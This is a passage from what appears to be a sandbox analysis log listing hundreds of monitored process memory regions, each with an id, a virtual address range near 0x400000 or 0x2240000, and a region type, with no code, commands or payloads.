start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6300 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6301 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6302 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6303 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6304 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6305 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6306 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6307 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6308 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6309 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6310 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6311 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6312 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6313 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6314 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6315 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6316 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6317 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6318 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6319 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6320 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6321 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6322 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6323 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6324 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6325 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6326 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6327 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6328 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6329 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6330 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6331 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6332 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6333 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6334 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6335 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6336 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6337 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6338 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6339 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6340 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6341 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6342 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6343 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6344 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6345 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6346 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6347 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6348 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6349 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6350 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6351 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6352 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6353 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6354 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6355 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6356 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6357 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6358 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6359 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6360 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6361 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6362 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6363 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6364 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6365 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6366 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6367 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6368 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6369 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6370 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6371 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6372 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6373 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6374 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6375 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6376 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6377 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6378 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6379 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6380 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6381 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6382 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6383 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6384 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6385 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6386 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6387 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6388 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6389 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6390 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6391 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6392 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6393 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6394 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6395 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6396 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6397 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6398 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6399 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6400 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6401 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6402 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6403 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6404 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6405 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6406 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6407 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6408 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6409 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6410 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6411 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6412 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6413 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6414 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6415 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6416 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6417 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6418 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6419 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6420 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6421 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6422 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6423 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6424 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6425 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6426 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6427 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6428 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6429 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6430 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6431 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6432 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6433 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6434 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6435 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6436 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6437 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6438 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6439 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6440 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6441 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6442 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6443 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6444 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6445 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6446 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6447 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6448 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6449 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6450 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6451 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6452 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6453 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6454 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6455 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6456 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6457 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6458 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6459 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6460 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6461 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6462 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6463 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6464 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6465 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6466 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6467 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6468 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6469 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6470 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6471 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6472 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6473 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6474 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6475 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6476 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6477 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6478 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6479 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6480 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6481 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6482 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6483 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6484 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6485 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6486 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6487 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6488 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6489 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6490 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6491 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6492 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 